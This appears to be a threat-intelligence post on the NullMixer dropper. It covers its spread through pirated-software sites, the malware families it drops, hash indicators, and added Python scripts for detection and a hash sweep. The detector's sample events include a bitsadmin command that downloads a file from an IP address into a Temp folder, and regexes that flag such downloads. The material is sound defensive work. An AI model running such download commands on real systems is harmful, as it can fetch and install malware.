Related Families: SmokeLoader, RedLine Stealer, PseudoManuscrypt, ColdStealer, FormatLoader, CsdiMonetize, Disbuk, Fabookie, DanaBot, Racealer, Generic.ClipBanker, SgnitLoader, ShortLoader, Downloader.INNO, LgoogLoader, Downloader.Bitser, C-Joker, PrivateLoader, Satacom, GCleaner, Vidar
Verticals Targeted: Multiple
Kaspersky recently reported on NullMixer, a dropper used to drop a myriad of malware families, including SmokeLoader, RedLine Stealer, PseudoManuscrypt, ColdStealer, FormatLoader, CsdiMonetize, Disbuk, Fabookie, DanaBot, Racealer, Generic.ClipBanker, SgnitLoader, ShortLoader, Downloader.INNO, LgoogLoader, Downloader.Bitser, C-Joker, PrivateLoader, Satacom, GCleaner, and Vidar.
- NullMixer drops a myriad of malware families.
- NullMixer is typically disguised as software related to cracks, keygens, and activators.
- Currently, at least 21 families are dropped by NullMixer, including bankers, backdoors, stealers, and others.
NullMixer is a dropper currently being used to deliver multiple malware families. According to Kaspersky, NullMixer is spread via malicious websites offering cracks, keygens, and activators used for software piracy. Most NullMixer activity was observed targeting users in the US, Brazil, India, Russia, Italy, Germany, France, Egypt, and Turkey.
The threat actors behind NullMixer use search engine optimization (SEO) poisoning to keep their sites near the top of search results. When victims attempt to download software from the sites, they are sent through multiple redirects and eventually land on a page serving a password-protected archive. The password protection keeps the archive contents opaque to automated scanning at the network edge. While victims believe they are downloading the desired software, the archive actually contains NullMixer.
NullMixer drops the following malware families:
SmokeLoader is a modular malware primarily used to download and execute other payloads.
RedLine Stealer is a stealer malware that harvests various types of information, including saved credentials, autocomplete data, cryptocurrency wallet data, and credit card information. It also takes a system inventory of the victim's machine, gathering the username, location data, hardware configuration, and installed security software. RedLine Stealer can also upload and download files, execute commands, and send information about the infected computer to the C2.
PseudoManuscrypt is a MaaS (malware as a service) used to steal cookies from multiple applications, including Firefox, Chrome, Edge, Opera, and Yandex. The malware also allows keylogging and cryptocurrency theft using ClipBanker. PseudoManuscrypt uses the KCP protocol to download additional plugins.
ColdStealer is used to steal multiple types of information, including crypto wallets, FTP credentials, and credentials from browsers.
FormatLoader uses hardcoded URLs as format strings. It is used to download an additional file and infect a victim's machine.
CsdiMonetize is an advertising platform typically used to install PUAs (potentially unwanted applications). It also drops trojans, such as Glupteba.
Disbuk, also known as Socelar, steals Facebook cookies from Chrome and Firefox, access tokens, account IDs, and Amazon cookies. It installs a malicious browser extension masquerading as Google Translate.
Fabookie targets Facebook ads and steals browser session cookies. It also uses Facebook Graph API Queries to harvest information about a user’s account, linked payment method, balance, and friends.
DanaBot is a modular banking trojan. Functionalities include stealing information and injecting fake forms to collect payment data. It can also give a threat actor full remote access to a machine using the VNC plugin.
Racealer, also known as RaccoonStealer, is a relatively unsophisticated malware-as-a-service stealer written in C/C++. More recent versions use Telegram to retrieve C2 information and malware configurations.
Generic.ClipBanker is a clipboard hijacker. It monitors the victim machine for cryptocurrency addresses and replaces them with the threat actor’s cryptocurrency wallet address to intercept payments.
SgnitLoader is a trojan downloader written in C#.
ShortLoader is another trojan downloader.
Downloader.INNO is an Inno Setup installer that utilizes Inno Download Plugin to download a file from the C2. The downloaded file is related to the Satacom downloader family.
LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. Once the files are written, it executes the batch file.
Downloader.Bitser is an NSIS installer that installs Lightning Media Player and runs the built-in Windows tool bitsadmin to download additional files.
C-Joker is an Exodus wallet stealer.
PrivateLoader is a pay-per-install loader similar to LgoogLoader and SmokeLoader.
Satacom, also known as LegionLoader, is a loader that uses anti-analysis methods borrowed from the open-source al-khaser test suite.
GCleaner is a pay-per-install loader. It was previously distributed as Garbage Cleaner, which mimicked CCleaner. GCleaner is used to download additional malware such as Azorult, Vidar, Predator the Thief, and others.
Vidar is an infostealer that grabs saved passwords, browser autofill information, cookies, saved payment information, browser history, coin wallets, and Telegram databases. It can also take screenshots.
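Two of the loader behaviors described above leave process-creation footprints a SOC can alert on: Downloader.Bitser invoking bitsadmin to fetch a file from a URL, and LgoogLoader's batch file launching an AutoIt interpreter against a dropped script. The following is an added detection example written for this post; it is not PolySwarm tooling or code from the report. The Sysmon-style field names, the sample process records, and the list of "user-writable" directories are constructed assumptions for illustration.

```python
"""Process-creation detections for two NullMixer-delivered loader behaviors.

Added example, not from PolySwarm or the original report. Rules:
  1. bitsadmin /transfer pulling from an http(s) URL (Downloader.Bitser).
  2. An AutoIt interpreter running a script out of a user-writable
     directory, optionally spawned by cmd.exe, i.e. a batch file (LgoogLoader).
Field names and sample records below are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Sequence


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # path of the newly created process
    command_line: str   # full command line as logged
    parent_image: str   # path of the parent process


# bitsadmin /transfer <job> [/download] [/priority x] <remote-url> <local-file>
BITSADMIN_DOWNLOAD = re.compile(
    r"bitsadmin(?:\.exe)?\s+(?:/|-)transfer\b.*?\bhttps?://", re.IGNORECASE)

# Stock AutoIt interpreter binary names; a renamed copy is caught by the
# script-extension check on the command line instead.
AUTOIT_IMAGE = re.compile(r"(?:^|\\)autoit3(?:_x64)?\.exe$", re.IGNORECASE)
AUTOIT_SCRIPT_ARG = re.compile(r"\S+\.(?:au3|a3x)\b", re.IGNORECASE)

# Directories an unprivileged user can write to (assumption for this example).
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop)|ProgramData|Windows\\Temp)\\",
    re.IGNORECASE)


def detect(ev: ProcessEvent) -> List[str]:
    """Return the list of rule names the event triggers (empty if benign)."""
    tags: List[str] = []
    if BITSADMIN_DOWNLOAD.search(ev.command_line):
        tags.append("bitsadmin_url_download")

    is_autoit = bool(AUTOIT_IMAGE.search(ev.image)) or \
        bool(AUTOIT_SCRIPT_ARG.search(ev.command_line))
    if is_autoit and USER_WRITABLE.search(ev.command_line):
        tags.append("autoit_script_from_user_dir")
        # A batch file runs under cmd.exe, so cmd as parent raises confidence.
        if ev.parent_image.lower().endswith("\\cmd.exe"):
            tags.append("autoit_spawned_by_cmd")
    return tags


def run(events: Sequence[ProcessEvent]) -> Dict[int, List[str]]:
    """Map event index -> triggered rules, omitting events with no hits."""
    results: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        tags = detect(ev)
        if tags:
            results[i] = tags
    return results


# Constructed sample records: two malicious, two benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Windows\System32\bitsadmin.exe",
        command_line=r"bitsadmin /transfer upd /download /priority high "
                     r"http://198.51.100.7/a.bin C:\Users\bob\AppData\Local\Temp\a.bin",
        parent_image=r"C:\Users\bob\Downloads\setup.exe"),
    ProcessEvent(
        image=r"C:\Users\bob\AppData\Local\Temp\AutoIt3.exe",
        command_line=r'"C:\Users\bob\AppData\Local\Temp\AutoIt3.exe" '
                     r"C:\Users\bob\AppData\Local\Temp\run.a3x",
        parent_image=r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(  # benign: bitsadmin listing jobs, no URL involved
        image=r"C:\Windows\System32\bitsadmin.exe",
        command_line=r"bitsadmin /list /allusers",
        parent_image=r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(  # benign: installed AutoIt running a script from Program Files
        image=r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe",
        command_line=r'"C:\Program Files (x86)\AutoIt3\AutoIt3.exe" '
                     r'"C:\Program Files (x86)\Tools\inventory.au3"',
        parent_image=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, tags in run(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, tags)
```

The bitsadmin rule keys on the `/transfer` verb plus a URL rather than on the binary alone, since bitsadmin is a legitimate administrative tool; the AutoIt rule requires both an interpreter and a script path under a user-writable directory, so a vendor-installed AutoIt under Program Files does not fire. Tune the directory list to your environment before deploying.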
PolySwarm has multiple samples of NullMixer.
- f2ec0aaf1cd2359465bd42b1951d1c59267137ddba96c85f28c981d622ecf093
- b69a81971bd4800d1737ef67ef47e5b6793723c1fd4b75dfbdddf8b28bd93dd5
- c91dec1cd5b97079481c76d5d597dde67b60c301ea900eab7db99776d52b465a
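The SHA-256 values above are the kind of indicator most teams push straight into a file-hash sweep. The following is an added example written for this post, not PolySwarm code: it streams every regular file under a directory through SHA-256, normalizes the indicator list, and reports matches. The directory to scan is whatever the caller supplies; the three hashes are taken from the list above.

```python
"""Sweep a directory tree for files matching the NullMixer SHA-256 IOCs above.

Added example for this post, not PolySwarm tooling. The hash set below is
copied from the report; scan_tree() hashes files in streaming fashion so
large installer archives do not have to fit in memory.
"""
import hashlib
import os
from pathlib import Path
from typing import Dict, Iterable, Set

# SHA-256 digests of NullMixer samples listed in the report above.
NULLMIXER_SHA256: Set[str] = {
    "f2ec0aaf1cd2359465bd42b1951d1c59267137ddba96c85f28c981d622ecf093",
    "b69a81971bd4800d1737ef67ef47e5b6793723c1fd4b75dfbdddf8b28bd93dd5",
    "c91dec1cd5b97079481c76d5d597dde67b60c301ea900eab7db99776d52b465a",
}


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in 1 MiB chunks and return the lowercase hex digest."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def normalize_iocs(iocs: Iterable[str]) -> Set[str]:
    """Lowercase and validate indicators; feeds often mix case or carry whitespace.

    Raises ValueError on anything that is not a 64-character hex string, so a
    malformed feed fails loudly instead of silently matching nothing.
    """
    out: Set[str] = set()
    for ioc in iocs:
        ioc = ioc.strip().lower()
        if len(ioc) != 64 or any(c not in "0123456789abcdef" for c in ioc):
            raise ValueError(f"not a SHA-256 hex digest: {ioc!r}")
        out.add(ioc)
    return out


def scan_tree(root: Path, iocs: Iterable[str] = NULLMIXER_SHA256) -> Dict[str, str]:
    """Walk root recursively; return {file_path: digest} for every IOC match.

    Symlinks are skipped so a planted link cannot redirect the sweep, and
    unreadable files are skipped rather than aborting the whole scan.
    """
    wanted = normalize_iocs(iocs)
    hits: Dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_symlink():
                continue
            try:
                digest = sha256_file(p)
            except OSError:
                continue
            if digest in wanted:
                hits[str(p)] = digest
    return hits


if __name__ == "__main__":
    import sys
    target = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path, digest in scan_tree(target).items():
        print(f"MATCH {digest} {path}")
```

Run it against a user's Downloads folder or a quarantine share; an empty result means none of the three known samples are present, not that the host is clean, since NullMixer builds are repacked frequently and the dropped payloads carry their own hashes.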
You can use the following CLI command to search for all NullMixer samples in our portal:
$ polyswarm link list -f NullMixer